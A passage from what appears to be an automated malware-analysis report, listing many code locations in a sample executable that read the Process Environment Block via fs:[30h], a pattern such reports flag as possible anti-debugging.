      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E46FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E488ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3ED294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3ED294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4346A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3F8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E488B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E488F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E48070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E48070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4353CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4353CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E46D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3F37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E485BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E472073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E481074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E484015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E484015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3F90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E488CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4714FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E433884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E433884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E433540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3D7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E43A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E488D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3F3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4441E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E468DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3EA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3DC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E3CD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4805AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4369A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\F63V4i8eZU.exe  Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h]
